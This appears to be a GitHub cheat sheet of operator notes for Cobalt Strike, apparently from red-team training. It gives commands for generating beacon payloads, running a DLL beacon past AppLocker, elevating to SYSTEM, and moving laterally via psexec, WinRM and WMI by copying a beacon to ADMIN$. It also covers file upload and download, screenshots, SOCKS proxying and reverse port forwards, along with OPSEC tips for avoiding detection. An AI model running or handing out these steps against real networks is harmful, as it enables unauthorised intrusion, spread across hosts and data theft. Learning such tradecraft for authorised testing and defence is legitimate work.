You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Cobalt Strike --> Listeners --> Click the Add button and a New Listener dialogue will appear.
Choose a descriptive name such as <protocol>-<port> example: http-80.
Set the variables and click Save.
Create a payload
OPSEC: Staged payloads are good if your delivery method limits the amount of data you can send. However, they tend to have more indicators compared to stageless. Given the choice, go stageless.
OPSEC: The use of 64-bit payloads on 64-bit Operating Systems is preferable to using 32-bit payloads on 64-bit Operating Systems.
Attacks --> Packages --> Windows Executable (S).
Create dll payload
Bypasses default applocker configuration
C:\Windows\System32\rundll32.exe C:\Users\Administrator\Desktop\beacon.dll,StartW
link <COMPUTERNAME>
Create peer-to-peer listener
Creating P2P listeners can be done in the Listeners menu, by selecting the TCP or SMB Beacon payload type.
Then create payload for the new listener!
Connect to beacon
Works like a bind shell. Most used are SMB or TCP.
Run the payload on the target
Connect to the beacon with link for smb and connect for tcp.
connect <IP> <PORT>
link <IP>
Create pivot listener
To start a Pivot Listener on an existing Beacon, right-click it and select Pivoting --> Listener.
Might need to open port on the firewall
Upload and download files
upload <FILE>
download <FILE>
Take screenshots
printscreen Take a single screenshot via PrintScr method
screenshot Take a single screenshot
screenwatch Take periodic screenshots of desktop
Not all UAC bypasses are created equal, can elevate to system with:
Elevate to system
elevate svc-exe
Lateral movement
Jump
jump [method] [target] [listener]
Exploit Arch Description
------- ---- -----------
psexec x86 Use a service to run a Service EXE artifact
psexec64 x64 Use a service to run a Service EXE artifact
psexec_psh x86 Use a service to run a PowerShell one-liner
winrm x86 Run a PowerShell script via WinRM
winrm64 x64 Run a PowerShell script via WinRM
Remote-exec
remote-exec [method] [target] [command]
psexec Remote execute via Service Control Manager
winrm Remote execute via WinRM (PowerShell)
wmi Remote execute via WMI
Using credentials
Each of these strategies are compatible with the various credential and impersonation methods described in the next section, Credentials & User Impersonation. For instance, if you have plaintext
credentials of a domain user who is a local administrator on a target, use make_token and then jump to use that user's credentials to move laterally to the target.
cd \\<HOSTNAME>\ADMIN$
upload C:\Payloads\beacon-smb.exe
remote-exec wmi <HOSTNAME> C:\Windows\beacon-smb.exe
link <HOSTNAME>
WMI exec commands
remote-exec winrm <HOSTNAME> whoami; hostname
CoInitializeSecurity
Beacon's internal implementation of WMI uses a Beacon Object File, executed using the beacon_inline_execute Aggressor function. When a BOF is executed the CoInitializeSecurity COM object can be called, which is used to set the security context for the current process. According to Microsoft's documentation, this can only be called once per process. The unfortunate consequence is that if you have CoInitializeSecurity get called in the context of, say "User A", then future BOFs may not be able to inherit a different security context ("User B") for the lifetime of the Beacon process.
if CoInitializeSecurity has already been called, WMI fails with access denied.
As a workaround, your WMI execution needs to come from a different process. This can be achieved with commands such as spawn and spawnas, or even execute-assembly with a tool such as SharpWMI.
Open Proxifier, go to Profile > Proxy Servers and Add a new proxy entry, which will point at the IP address and Port of your Cobalt Strike SOCKS proxy.
Next, go to Profile > Proxification Rules. This is where you can add rules that tell Proxifier when and where to proxy specific applications. Multiple applications can be added to the same rule, but in this example, I'm creating a single rule for adexplorer64.exe (part of the Sysinternals Suite).
Target hosts fill in the target internal network range with the action proxy socks <TARGET>
NOTE: You will also need to add a static host entry in your C:\Windows\System32\drivers\etc\hosts file: . You can enable DNS lookups through Proxifier, but that will cause DNS leaks from your computer into the target environment.
Beacon's reverse port forward always tunnels the traffic to the Team Server and the Team Server sends the traffic to its intended destination, so shouldn't be used to relay traffic between individual machines.
Does not require administrator privs
rportfwd <PORT> <IP> <PORT>
Stop port forward rportfwd
rportfwd stop <PORT>
Create port forward rportfwd_local
Beacon also has a rportfwd_local command. Whereas rportfwd will tunnel traffic to the Team Server, rportfwd_local will tunnel the traffic to the machine running the Cobalt Strike client.